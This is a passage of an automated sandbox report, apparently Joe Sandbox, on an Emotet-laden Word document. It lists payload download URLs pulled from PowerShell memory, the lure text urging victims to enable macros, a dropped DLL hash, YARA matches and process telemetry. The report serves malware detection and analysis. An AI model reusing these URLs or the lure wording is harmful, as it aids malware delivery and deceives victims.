                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2120574374.0000000003C1C000.00000004.00000001.sdmpString found in binary or memory: https://theo.digital
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: https://theo.digital/wp-admin/Zyl2/
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/P
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000007.00000002.2124049424.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2135634388.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2345582268.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2161670466.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2168147039.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2125246682.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2124029835.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2345600716.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2144436282.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2134225145.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2158222517.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2346676454.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2144335956.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2145866695.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2158182708.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2168130211.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2173566847.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2134257328.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 3,934 N@m 13 ;a 1009
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G)
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G) A GE)
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5569
                      Source: unknownProcess created: Commandline size = 5468
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5468
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fqtgesmysxdwyacz\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100189F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100056B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100106C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100142E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100094EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100199A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100173C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100177C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100193C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100137F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B3FE
                      Source: 68254_2001.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Gci_56o45gw, Function Document_open
                      Source: 68254_2001.docOLE indicator, VBA macros: true
                      Source: 68254_2001.docOLE indicator application name: unknown
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@20/14@7/10
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$254_2001.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCFCC.tmpJump to behavior
                      Source: 68254_2001.docOLE indicator, Word Document stream: true
                      Source: 68254_2001.docOLE document summary: title field not present or empty
                      Source: 68254_2001.docOLE document summary: author field not present or empty
                      Source: 68254_2001.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............2........................... .>.......>............. .......................#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ............2...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........g.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................(.j....................................}..v.....^......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................(.j..... ..............................}..v....p_......0.................g.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................(.j....................................}..v....0l......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................(.j......g.............................}..v.....l......0...............x.g.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............T(.j....................................}..v....p.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............T(.j..... ..............................}..v............0.................g.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............d..j.....Fg.............................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....X...............................}..v............0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............d..j.....Fg.............................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....X...............................}..v............0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............d..j.....Fg.............................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....X...............................}..v............0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................Cg.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j....................................}..v....(.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.7.............}..v....8.......0................Cg.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8%......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....%..............................}..v....p&......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8-......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....-..............................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....85......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....5..............................}..v....p6......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8=......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....=..............................}..v....p>......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8E......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....E..............................}..v....pF......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8M......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M..............................}..v....pN......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8U......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....U..............................}..v....pV......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......................d..j.....Fg.............................}..v....8]......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....]..............................}..v....p^......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8e......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....e..............................}..v....pf......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8m......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....m..............................}..v....pn......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8u......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....u..............................}..v....pv......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8}......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....}..............................}..v....p~......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............d..j.....Fg.............................}..v....8.......0...............................................
